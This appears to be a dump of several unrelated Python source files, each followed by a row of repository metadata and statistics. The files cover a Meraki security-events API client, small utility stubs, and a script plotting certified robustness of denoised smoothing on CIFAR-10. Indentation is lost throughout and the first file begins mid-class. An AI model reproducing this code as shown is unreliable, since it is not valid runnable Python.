def __init__(self, session):
super(SecurityEvents, self).__init__()
self._session = session
def getNetworkClientSecurityEvents(self, networkId: str, clientId: str, total_pages=1, direction='next', **kwargs):
"""
**List the security events for a client. Clients can be identified by a client key or either the MAC or IP depending on whether the network uses Track-by-IP.**
https://api.meraki.com/api_docs#list-the-security-events-for-a-client
- networkId (string)
- clientId (string)
- total_pages (integer or string): total number of pages to retrieve, -1 or "all" for all pages
- direction (string): direction to paginate, either "next" (default) or "prev" page
- t0 (string): The beginning of the timespan for the data. The maximum lookback period is 791 days from today.
- t1 (string): The end of the timespan for the data. t1 can be a maximum of 791 days after t0.
- timespan (number): The timespan for which the information will be fetched. If specifying timespan, do not specify parameters t0 and t1. The value must be in seconds and be less than or equal to 791 days. The default is 31 days.
- perPage (integer): The number of entries per page returned. Acceptable range is 3 - 1000. Default is 100.
- startingAfter (string): A token used by the server to indicate the start of the page. Often this is a timestamp or an ID but it is not limited to those. This parameter should not be defined by client applications. The link for the first, last, prev, or next page in the HTTP Link header should define it.
- endingBefore (string): A token used by the server to indicate the end of the page. Often this is a timestamp or an ID but it is not limited to those. This parameter should not be defined by client applications. The link for the first, last, prev, or next page in the HTTP Link header should define it.
"""
kwargs.update(locals())
metadata = {
'tags': ['Security events'],
'operation': 'getNetworkClientSecurityEvents',
}
resource = f'/networks/{networkId}/clients/{clientId}/securityEvents'
query_params = ['t0', 't1', 'timespan', 'perPage', 'startingAfter', 'endingBefore']
params = {k: v for (k, v) in kwargs.items() if k in query_params}
return self._session.get_pages(metadata, resource, params, total_pages, direction)
def getNetworkSecurityEvents(self, networkId: str, total_pages=1, direction='next', **kwargs):
"""
**List the security events for a network**
https://api.meraki.com/api_docs#list-the-security-events-for-a-network
- networkId (string)
- total_pages (integer or string): total number of pages to retrieve, -1 or "all" for all pages
- direction (string): direction to paginate, either "next" (default) or "prev" page
- t0 (string): The beginning of the timespan for the data. The maximum lookback period is 365 days from today.
- t1 (string): The end of the timespan for the data. t1 can be a maximum of 365 days after t0.
- timespan (number): The timespan for which the information will be fetched. If specifying timespan, do not specify parameters t0 and t1. The value must be in seconds and be less than or equal to 365 days. The default is 31 days.
- perPage (integer): The number of entries per page returned. Acceptable range is 3 - 1000. Default is 100.
- startingAfter (string): A token used by the server to indicate the start of the page. Often this is a timestamp or an ID but it is not limited to those. This parameter should not be defined by client applications. The link for the first, last, prev, or next page in the HTTP Link header should define it.
- endingBefore (string): A token used by the server to indicate the end of the page. Often this is a timestamp or an ID but it is not limited to those. This parameter should not be defined by client applications. The link for the first, last, prev, or next page in the HTTP Link header should define it.
"""
kwargs.update(locals())
metadata = {
'tags': ['Security events'],
'operation': 'getNetworkSecurityEvents',
}
resource = f'/networks/{networkId}/securityEvents'
query_params = ['t0', 't1', 'timespan', 'perPage', 'startingAfter', 'endingBefore']
params = {k: v for (k, v) in kwargs.items() if k in query_params}
return self._session.get_pages(metadata, resource, params, total_pages, direction)
def getOrganizationSecurityEvents(self, organizationId: str, total_pages=1, direction='next', **kwargs):
"""
**List the security events for an organization**
https://api.meraki.com/api_docs#list-the-security-events-for-an-organization
- organizationId (string)
- total_pages (integer or string): total number of pages to retrieve, -1 or "all" for all pages
- direction (string): direction to paginate, either "next" (default) or "prev" page
- t0 (string): The beginning of the timespan for the data. The maximum lookback period is 365 days from today.
- t1 (string): The end of the timespan for the data. t1 can be a maximum of 365 days after t0.
- timespan (number): The timespan for which the information will be fetched. If specifying timespan, do not specify parameters t0 and t1. The value must be in seconds and be less than or equal to 365 days. The default is 31 days.
- perPage (integer): The number of entries per page returned. Acceptable range is 3 - 1000. Default is 100.
- startingAfter (string): A token used by the server to indicate the start of the page. Often this is a timestamp or an ID but it is not limited to those. This parameter should not be defined by client applications. The link for the first, last, prev, or next page in the HTTP Link header should define it.
- endingBefore (string): A token used by the server to indicate the end of the page. Often this is a timestamp or an ID but it is not limited to those. This parameter should not be defined by client applications. The link for the first, last, prev, or next page in the HTTP Link header should define it.
"""
kwargs.update(locals())
metadata = {
'tags': ['Security events'],
'operation': 'getOrganizationSecurityEvents',
}
resource = f'/organizations/{organizationId}/securityEvents'
query_params = ['t0', 't1', 'timespan', 'perPage', 'startingAfter', 'endingBefore']
params = {k: v for (k, v) in kwargs.items() if k in query_params}
return self._session.get_pages(metadata, resource, params, total_pages, direction)
| 70.989691 | 314 | 0.686175 | 1,000 | 6,886 | 4.692 | 0.147 | 0.012788 | 0.026854 | 0.026854 | 0.880009 | 0.880009 | 0.880009 | 0.8685 | 0.8685 | 0.8685 | 0 | 0.016455 | 0.23221 | 6,886 | 96 | 315 | 71.729167 | 0.871004 | 0.662939 | 0 | 0.529412 | 0 | 0 | 0.226606 | 0.11128 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
137d3988fbdf887f40a59947b18d96d8d1352ff5 | 59 | py | Python | python-aliyun-api-gateway/aliyun/api/gateway/sdk/util/UUIDUtil.py | coco369/aliyun-api-gateway-python | 683a70786e36d1a089ec48da80b59b1f882f2976 | [
"Apache-2.0"
] | 2 | 2020-09-09T10:09:44.000Z | 2021-05-13T06:35:32.000Z | python-aliyun-api-gateway/aliyun/api/gateway/sdk/util/UUIDUtil.py | coco369/aliyun-api-gateway-python | 683a70786e36d1a089ec48da80b59b1f882f2976 | [
"Apache-2.0"
] | null | null | null | python-aliyun-api-gateway/aliyun/api/gateway/sdk/util/UUIDUtil.py | coco369/aliyun-api-gateway-python | 683a70786e36d1a089ec48da80b59b1f882f2976 | [
"Apache-2.0"
] | null | null | null | import uuid
def get_uuid():
return str(uuid.uuid4())
| 9.833333 | 28 | 0.661017 | 9 | 59 | 4.222222 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021277 | 0.20339 | 59 | 5 | 29 | 11.8 | 0.787234 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 6 |
b9286c72678bcc6eaa0ed8c14639473032405a0e | 22 | py | Python | IPython/testing/plugin/simplevars.py | dchichkov/ipython | 8096bb8640ee7e7c5ebdf3f428fe69cd390e1cd4 | [
"BSD-3-Clause-Clear"
] | 26 | 2018-02-14T23:52:58.000Z | 2021-08-16T13:50:03.000Z | IPython/testing/plugin/simplevars.py | dchichkov/ipython | 8096bb8640ee7e7c5ebdf3f428fe69cd390e1cd4 | [
"BSD-3-Clause-Clear"
] | 3 | 2015-04-01T13:14:57.000Z | 2015-05-26T16:01:37.000Z | IPython/testing/plugin/simplevars.py | dchichkov/ipython | 8096bb8640ee7e7c5ebdf3f428fe69cd390e1cd4 | [
"BSD-3-Clause-Clear"
] | 10 | 2018-08-13T19:38:39.000Z | 2020-04-19T03:02:00.000Z | x = 1
print 'x is:',x
| 7.333333 | 15 | 0.5 | 6 | 22 | 1.833333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 0.272727 | 22 | 2 | 16 | 11 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0.227273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.5 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
b92d1784202e284af1eb520ae5d1efa1ecdba4b1 | 379 | py | Python | Gds/src/fprime_gds/wxgui/GDS_WXFormBuilderFiles/GDSStatusPanelImpl.py | hunterpaulson/fprime | 70560897b56dc3037dc966c99751b708b1cc8a05 | [
"Apache-2.0"
] | null | null | null | Gds/src/fprime_gds/wxgui/GDS_WXFormBuilderFiles/GDSStatusPanelImpl.py | hunterpaulson/fprime | 70560897b56dc3037dc966c99751b708b1cc8a05 | [
"Apache-2.0"
] | 5 | 2020-07-13T16:56:33.000Z | 2020-07-23T20:38:13.000Z | Gds/src/fprime_gds/wxgui/GDS_WXFormBuilderFiles/GDSStatusPanelImpl.py | hunterpaulson/lgtm-fprime | 9eeda383c263ecba8da8188a45e1d020107ff323 | [
"Apache-2.0"
] | null | null | null | import wx
import GDSStatusPanelGUI
###########################################################################
## Class StatusImpl
###########################################################################
class StatusImpl(GDSStatusPanelGUI.Status):
def __init__(self, parent):
GDSStatusPanelGUI.Status.__init__(self, parent)
def __del__(self):
pass
| 25.266667 | 75 | 0.432718 | 23 | 379 | 6.608696 | 0.521739 | 0.197368 | 0.184211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.124011 | 379 | 14 | 76 | 27.071429 | 0.457831 | 0.042216 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0.142857 | 0.285714 | 0 | 0.714286 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
b960ad4750e4340522df6751a76001a9bb7945fb | 44 | py | Python | enthought/traits/ui/theme.py | enthought/etsproxy | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | [
"BSD-3-Clause"
] | 3 | 2016-12-09T06:05:18.000Z | 2018-03-01T13:00:29.000Z | enthought/traits/ui/theme.py | enthought/etsproxy | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | [
"BSD-3-Clause"
] | 1 | 2020-12-02T00:51:32.000Z | 2020-12-02T08:48:55.000Z | enthought/traits/ui/theme.py | enthought/etsproxy | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | [
"BSD-3-Clause"
] | null | null | null | # proxy module
from traitsui.theme import *
| 14.666667 | 28 | 0.772727 | 6 | 44 | 5.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.159091 | 44 | 2 | 29 | 22 | 0.918919 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b9988fa2014c98f763946b6fcdbe1fdd56978ea6 | 59,055 | py | Python | analyze.py | damon-demon/Black-Box-Defense | d810a694862e83b899ef6207713b2a8071c79c04 | [
"MIT"
] | 2 | 2022-02-26T22:14:01.000Z | 2022-03-04T20:46:27.000Z | analyze.py | OTML-Group/Black-Box-Defense | b4e1b9e6e1703a8d1ba7535d531647abb9705fe9 | [
"MIT"
] | null | null | null | analyze.py | OTML-Group/Black-Box-Defense | b4e1b9e6e1703a8d1ba7535d531647abb9705fe9 | [
"MIT"
] | 1 | 2022-03-15T00:10:33.000Z | 2022-03-15T00:10:33.000Z | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
from easydict import EasyDict as edict
from typing import *
import math
import matplotlib
matplotlib.use("TkAgg")
import matplotlib.pyplot as plt
import numpy as np
import os
import pandas as pd
import seaborn as sns
sns.set()
class Accuracy(object):
def at_radii(self, radii: np.ndarray):
raise NotImplementedError()
class ApproximateAccuracy(Accuracy):
def __init__(self, data_file_path: str):
self.data_file_path = data_file_path
def at_radii(self, radii: np.ndarray) -> np.ndarray:
df = pd.read_csv(self.data_file_path, delimiter="\t")
return np.array([self.at_radius(df, radius) for radius in radii])
def at_radius(self, df: pd.DataFrame, radius: float):
return (df["correct"] & (df["radius"] >= radius)).mean()
def get_abstention_rate(self) -> np.ndarray:
df = pd.read_csv(self.data_file_path, delimiter="\t")
return 1.*(df["predict"]==-1).sum()/len(df["predict"])*100
class ApproximateAccuracy_API(Accuracy):
def __init__(self, data_file_path: str):
self.data_file_path = data_file_path
def at_radii(self, radii: np.ndarray) -> np.ndarray:
df = pd.read_csv(self.data_file_path, header=None, delimiter="\t")
return np.array([self.at_radius(df, radius) for radius in radii])
def at_radius(self, df: pd.DataFrame, radius: float):
return (df[df.columns[1]] & (df[df.columns[2]] >= radius)).mean()
def get_abstention_rate(self) -> np.ndarray:
df = pd.read_csv(self.data_file_path, delimiter="\t")
return 1.*(df[df.columns[-1]]==-1).sum()/len(df[df.columns[-1]])*100
class Line(object):
def __init__(self, quantity: Accuracy, legend: str = None, plot_fmt: str = "", scale_x: float = 1, alpha: float = 1):
self.quantity = quantity
self.legend = legend
self.plot_fmt = plot_fmt
self.scale_x = scale_x
self.alpha = alpha
def plot_certified_accuracy_per_sigma_against_baseline(outfile: str, title: str, max_radius: float,
methods: List[Line]=None, label='Ours', methods_base: List[Line]=None, label_base='Baseline', radius_step: float = 0.01, upper_bounds=False) -> None:
color = ['b', 'orange', 'g', 'r']
sigmas = [0.12, 0.25, 0.5, 1.00]
if "api" in outfile:
sigmas = [0.12, 0.25]
for it, sigma in enumerate(sigmas):
methods_sigma = [method for method in methods if '{:.2f}'.format(sigma) in method.quantity.data_file_path]
accuracies_cert_ours, radii = _get_accuracies_at_radii(methods_sigma, 0, max_radius, radius_step)
plt.plot(radii, accuracies_cert_ours.max(0), color[it], label='{}|$\sigma = {:.2f}$'.format(label, sigma))
for it, line in enumerate(methods_base):
plt.plot(radii * line.scale_x, line.quantity.at_radii(radii), color[it], dashes=[2, 2], alpha=line.alpha, label='{}|'.format(label_base)+line.legend)
plt.ylim((0, 1))
plt.xlim((0, max_radius))
plt.tick_params(labelsize=14)
plt.xlabel("$\ell_2$ radius", fontsize=16)
plt.ylabel("Certified Accuracy", fontsize=16)
if "api" not in outfile:
plt.gca().xaxis.set_major_locator(plt.MultipleLocator(0.5))
plt.legend(loc='upper right', fontsize=16)
plt.tight_layout()
plt.savefig(outfile + ".pdf")
plt.title(title, fontsize=20)
plt.tight_layout()
plt.savefig(outfile + ".png", dpi=300)
plt.close()
def plot_certified_accuracy_per_sigma_against_baseline_finetune(outfile: str, title: str, max_radius: float,
methods: List[Line]=None, label='Ours', methods_finetune=None, label_finetune="Finetune", methods_base: List[Line]=None, label_base='Baseline', radius_step: float = 0.01, upper_bounds=False) -> None:
color = ['b', 'orange', 'g', 'r']
sigmas = [0.12, 0.25, 0.5, 1.00]
if "api" in outfile:
sigmas = [0.25]
for it, sigma in enumerate(sigmas):
methods_eps = [method for method in methods_finetune if '{:.2f}'.format(sigma) in method.quantity.data_file_path]
accuracies_cert_ours, radii = _get_accuracies_at_radii(methods_eps, 0, max_radius, radius_step)
plt.plot(radii, accuracies_cert_ours.max(0), color[3], label='{}|$\sigma = {:.2f}$'.format(label_finetune, sigma))
for it, sigma in enumerate(sigmas):
methods_eps = [method for method in methods if '{:.2f}'.format(sigma) in method.quantity.data_file_path]
accuracies_cert_ours, radii = _get_accuracies_at_radii(methods_eps, 0, max_radius, radius_step)
plt.plot(radii, accuracies_cert_ours.max(0), color[0], label='{}|$\sigma = {:.2f}$'.format(label, sigma))
for it, line in enumerate(methods_base):
if "0.25" not in line.quantity.data_file_path:
continue
plt.plot(radii * line.scale_x, line.quantity.at_radii(radii), color[1], alpha=line.alpha, label='{}|'.format(label_base)+line.legend)
plt.ylim((0, 1))
plt.xlim((0, max_radius))
plt.tick_params(labelsize=14)
plt.xlabel("$\ell_2$ radius", fontsize=16)
plt.ylabel("Certified Accuracy", fontsize=16)
if "api" not in outfile:
plt.gca().xaxis.set_major_locator(plt.MultipleLocator(0.5))
plt.legend(loc='upper right', fontsize=16)
plt.tight_layout()
plt.savefig(outfile + ".pdf")
plt.title(title, fontsize=20)
plt.tight_layout()
plt.savefig(outfile + ".png", dpi=300)
plt.close()
def plot_certified_accuracy_per_sigma_best_model(outfile: str, title: str, max_radius: float,
methods: List[Line]=None, label='Ours', methods_base: List[Line]=None, label_base='Baseline', radius_step: float = 0.01, upper_bounds=False, sigmas=[0.25]) -> None:
color = ['b', 'orange', 'g', 'r']
for it, sigma in enumerate(sigmas):
methods_sigma = [method for method in methods if '{:.2f}'.format(sigma) in method.quantity.data_file_path]
accuracies_cert_ours, radii = _get_accuracies_at_radii(methods_sigma, 0, max_radius, radius_step)
accuracies_cert_ours = np.nan_to_num(accuracies_cert_ours, -1)
plt.plot(radii, accuracies_cert_ours[accuracies_cert_ours[:,0].argmax(), :], color[it], label='{}|$\sigma = {:.2f}$'.format(label, sigma))
for it, sigma in enumerate(sigmas):
methods_sigma_base = [method for method in methods_base if '{:.2f}'.format(sigma) in method.quantity.data_file_path]
accuracies_cert_ours, radii = _get_accuracies_at_radii(methods_sigma_base, 0, max_radius, radius_step)
accuracies_cert_ours = np.nan_to_num(accuracies_cert_ours, -1)
plt.plot(radii, accuracies_cert_ours[accuracies_cert_ours[:,0].argmax(), :], color[it], dashes=[2, 2], label='{}|$\sigma = {:.2f}$'.format(label_base, sigma))
plt.ylim((0, 1))
plt.xlim((0, max_radius))
plt.tick_params(labelsize=14)
plt.xlabel("$\ell_2$ radius", fontsize=16)
plt.ylabel("Certified Accuracy", fontsize=16)
plt.gca().xaxis.set_major_locator(plt.MultipleLocator(0.5))
plt.legend(loc='upper right', fontsize=16)
plt.tight_layout()
plt.savefig(outfile + ".pdf")
plt.title(title, fontsize=20)
plt.tight_layout()
plt.savefig(outfile + ".png", dpi=300)
plt.close()
def plot_certified_accuracy_one_sigma_best_model_multiple_methods(outfile: str, title: str, max_radius: float,
methods_labels_colors_dashes: List,
radius_step: float = 0.01, upper_bounds=False, sigma=0.25) -> None:
for it, (methods, label, color, dashes) in enumerate(methods_labels_colors_dashes):
methods_sigma = [method for method in methods if '{:.2f}'.format(sigma) in method.quantity.data_file_path]
accuracies_cert_ours, radii = _get_accuracies_at_radii(methods_sigma, 0, max_radius, radius_step)
accuracies_cert_ours = np.nan_to_num(accuracies_cert_ours, -1)
plt.plot(radii, accuracies_cert_ours[accuracies_cert_ours[:,0].argmax(), :],
color, dashes=dashes, linewidth=2, label=label)
plt.ylim((0, 1))
plt.xlim((0, max_radius))
plt.tick_params(labelsize=14)
plt.xlabel("$\ell_2$ radius", fontsize=16)
plt.ylabel("Certified Accuracy", fontsize=16)
plt.gca().xaxis.set_major_locator(plt.MultipleLocator(0.5))
plt.legend(loc='upper right', fontsize=16)
plt.tight_layout()
plt.savefig(outfile + ".pdf")
plt.title(title, fontsize=20)
plt.tight_layout()
plt.savefig(outfile + ".png", dpi=300)
plt.close()
def latex_table_certified_accuracy_upper_envelope(outfile: str, radius_start: float, radius_stop: float, radius_step: float,
methods: List[Line]=None, clean_accuracy=True):
accuracies, radii = _get_accuracies_at_radii(methods, radius_start, radius_stop, radius_step)
clean_accuracies, _ = _get_accuracies_at_radii(methods, 0, 0, 0.25)
assert clean_accuracies.shape[1] == 1
f = open(outfile, 'w')
f.write("$\ell_2$ Radius")
for radius in radii:
f.write("& ${:.3}$".format(radius))
f.write("\\\\\n")
f.write("\midrule\n")
clean_accuracies = np.nan_to_num(clean_accuracies, -1)
accuracies = np.nan_to_num(accuracies, -1)
for j, radius in enumerate(radii):
argmaxs = np.argwhere(accuracies[:,j] == accuracies[:, j].max())
argmaxs = argmaxs.flatten()
i = argmaxs[clean_accuracies[argmaxs, 0].argmax()]
# i = i.flatten()[0]
if clean_accuracy:
txt = " & $^{("+"{:.2f})".format(clean_accuracies[i, 0]) + "}" + "${:.2f}".format(accuracies[i, j])
else:
txt = " & {:.2f}".format(accuracies[i, j])
f.write(txt)
f.write("\\\\\n")
f.close()
def _get_accuracies_at_radii(methods: List[Line], radius_start: float, radius_stop: float, radius_step: float):
radii = np.arange(radius_start, radius_stop + radius_step, radius_step)
accuracies = np.zeros((len(methods), len(radii)))
for i, method in enumerate(methods):
accuracies[i, :] = method.quantity.at_radii(radii)
return accuracies, radii
if __name__ == "__main__":
if not os.path.isdir("analysis/plots/cifar10/full_access"):
os.makedirs("analysis/plots/cifar10/full_access")
if not os.path.isdir("analysis/plots/cifar10/query_access"):
os.makedirs("analysis/plots/cifar10/query_access")
if not os.path.isdir("analysis/plots/imagenet/full_access"):
os.makedirs("analysis/plots/imagenet/full_access")
if not os.path.isdir("analysis/plots/imagenet/query_access"):
os.makedirs("analysis/plots/imagenet/query_access")
if not os.path.isdir("analysis/plots/vision_api/azure/"):
os.makedirs("analysis/plots/vision_api/azure/")
if not os.path.isdir("analysis/plots/vision_api/google/"):
os.makedirs("analysis/plots/vision_api/google/")
if not os.path.isdir("analysis/plots/vision_api/aws/"):
os.makedirs("analysis/plots/vision_api/aws/")
if not os.path.isdir("analysis/plots/vision_api/clarifai/"):
os.makedirs("analysis/plots/vision_api/clarifai/")
if not os.path.isdir("analysis/latex/"):
os.makedirs("analysis/latex/")
################### PLOTS
# Paper plots
all_cifar_cohen_N10000=[
Line(ApproximateAccuracy("data/certify/cifar10/no_denoiser/MODEL_resnet110_90epochs/noise_{0:.2f}/test_N10000/sigma_{0:.2f}".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.5, 1.0]
]
cifar_no_denoiser_N10000 = [
Line(ApproximateAccuracy("data/certify/cifar10/no_denoiser/MODEL_resnet110_90epochs/noise_0.00/test_N10000/sigma_{0:.2f}".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.5, 1.0]
]
cifar_denoiser_cifar10_dncnn_epochs_90_N10000 = [
Line(ApproximateAccuracy("data/certify/cifar10/mse_obj/MODEL_resnet110_90epochs_DENOISER_cifar10_dncnn_epochs_90/noise_{0:.2f}/test_N10000/sigma_{0:.2f}".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.5, 1.0]
]
cifar_denoiser_cifar10_dncnn_wide_epochs_90_N10000 = [
Line(ApproximateAccuracy("data/certify/cifar10/mse_obj/MODEL_resnet110_90epochs_DENOISER_cifar10_dncnn_wide_epochs_90/noise_{0:.2f}/test_N10000/sigma_{0:.2f}".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.5, 1.0]
]
cifar_denoiser_cifar10_memnet_epochs_90_N10000 = [
Line(ApproximateAccuracy("data/certify/cifar10/mse_obj/MODEL_resnet110_90epochs_DENOISER_cifar10_memnet_epochs_90/noise_{0:.2f}/test_N10000/sigma_{0:.2f}".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.5, 1.0]
]
all_cifar_denoising_obj_denoisers = cifar_denoiser_cifar10_dncnn_epochs_90_N10000 + \
cifar_denoiser_cifar10_dncnn_wide_epochs_90_N10000 + \
cifar_denoiser_cifar10_memnet_epochs_90_N10000
### Full-Access Cifar10
denoiser_networks = ['dncnn', 'dncnn_wide', 'memnet']
all_exp_resnet110_fullAccess_cifar10_classification = [
Line(ApproximateAccuracy("data/certify/cifar10/clf_obj/{0}_resnet110_90epochs_{1}/noise_{2:.2f}/test_N10000/sigma_{2:.2f}".format(exp, denoiser, noise)), "$\sigma = {:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.50, 1.00]
for exp in [
# each of these correspond to a hyperparamter setting (see the appendix in the paper for details)
'MODEL_resnet110_90epochs_DENOISER_cifar10_classification_obj_adamThenSgd_1',
'MODEL_resnet110_90epochs_DENOISER_cifar10_classification_obj_adamThenSgd_2',
'MODEL_resnet110_90epochs_DENOISER_cifar10_classification_obj_adamThenSgd_3',
'MODEL_resnet110_90epochs_DENOISER_cifar10_classification_obj_adamThenSgd_4',
'MODEL_resnet110_90epochs_DENOISER_cifar10_classification_obj_adamThenSgd_5',
]
for denoiser in denoiser_networks
]
all_exp_resnet110_fullAccess_cifar10_stability = [
Line(ApproximateAccuracy("data/certify/cifar10/stab_obj/{0}_resnet110_90epochs_{1}/noise_{2:.2f}/test_N10000/sigma_{2:.2f}".format(exp, denoiser, noise)), "$\sigma = {:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.50, 1.00]
for exp in [
# each of these correspond to a hyperparamter setting (see the appendix in the paper for details)
'MODEL_resnet110_90epochs_DENOISER_cifar10_smoothness_obj_adamThenSgd_1',
'MODEL_resnet110_90epochs_DENOISER_cifar10_smoothness_obj_adamThenSgd_2',
'MODEL_resnet110_90epochs_DENOISER_cifar10_smoothness_obj_adamThenSgd_3',
'MODEL_resnet110_90epochs_DENOISER_cifar10_smoothness_obj_adamThenSgd_4',
'MODEL_resnet110_90epochs_DENOISER_cifar10_smoothness_obj_adamThenSgd_5',
]
for denoiser in denoiser_networks
]
all_exp_resnet110_fullAccess_cifar10_stability_finetune = [
Line(ApproximateAccuracy("data/certify/cifar10/stab+mse_obj/{0}_{1}/noise_{2:.2f}/test_N10000/sigma_{2:.2f}".format(exp, denoiser, noise)), "$\sigma = {:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.50, 1.00]
for exp in [
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_adam_1e-4_20epochs_renset110_90epochs',
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_adam_1e-5_20epochs_renset110_90epochs',
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_sgd_1e-4_20epochs_renset110_90epochs',
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_sgd_1e-5_20epochs_renset110_90epochs',
]
for denoiser in denoiser_networks
]
# Plot best models
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/cifar10/full_access/resnet110_90epochs_all_methods_sigma_12", 'Query-access Cifar10-ResNet110', 1.0,
methods_labels_colors_dashes=[
(all_cifar_cohen_N10000, 'White-box', 'b', [1, 0]),
(all_exp_resnet110_fullAccess_cifar10_stability, 'Stab', 'g', [6, 2]),
(all_exp_resnet110_fullAccess_cifar10_stability_finetune, 'Stab+MSE', 'orange', [4, 2]),
(all_cifar_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
(cifar_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
],
sigma=0.12)
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/cifar10/full_access/resnet110_90epochs_all_methods_sigma_25", 'Query-access Cifar10-ResNet110', 1.0,
methods_labels_colors_dashes=[
(all_cifar_cohen_N10000, 'White-box', 'b', [1, 0]),
(all_exp_resnet110_fullAccess_cifar10_stability, 'Stab', 'g', [6, 2]),
(all_exp_resnet110_fullAccess_cifar10_stability_finetune, 'Stab+MSE', 'orange', [4, 2]),
(all_cifar_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
(cifar_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
],
sigma=0.25)
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/cifar10/full_access/resnet110_90epochs_all_methods_sigma_50", 'Query-access Cifar10-ResNet110', 1.0,
methods_labels_colors_dashes=[
(all_cifar_cohen_N10000, 'White-box', 'b', [1, 0]),
(all_exp_resnet110_fullAccess_cifar10_stability, 'Stab', 'g', [6, 2]),
(all_exp_resnet110_fullAccess_cifar10_stability_finetune, 'Stab+MSE', 'orange', [4, 2]),
(all_cifar_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
(cifar_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
],
sigma=0.50)
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/cifar10/full_access/resnet110_90epochs_all_methods_sigma_100", 'Query-access Cifar10-ResNet110', 1.0,
methods_labels_colors_dashes=[
(all_cifar_cohen_N10000, 'White-box', 'b', [1, 0]),
(all_exp_resnet110_fullAccess_cifar10_stability, 'Stab', 'g', [6, 2]),
(all_exp_resnet110_fullAccess_cifar10_stability_finetune, 'Stab+MSE', 'orange', [4, 2]),
(all_cifar_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
(cifar_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
],
sigma=1.00)
plot_certified_accuracy_per_sigma_best_model(
"analysis/plots/cifar10/full_access/resnet110_90epochs_stab_vs_clf", 'Stability vs. Classification', 2.25,
methods=all_exp_resnet110_fullAccess_cifar10_stability, label='Stab',
methods_base=all_exp_resnet110_fullAccess_cifar10_classification, label_base='Clf',
sigmas=[0.12, 0.25, 0.5, 1.0])
#######################################################################################
### Query-Access Cifar10
denoiser_networks = ['dncnn', 'dncnn_wide', 'memnet']
all_exp_resnet110_queryAccess_cifar10_classification = [
Line(ApproximateAccuracy("data/certify/cifar10/clf_obj/{0}_multi_classifiers_{1}/noise_{2:.2f}/test_N10000/sigma_{2:.2f}".format(exp, denoiser, noise)), "$\sigma = {:.2f}$".format(noise))
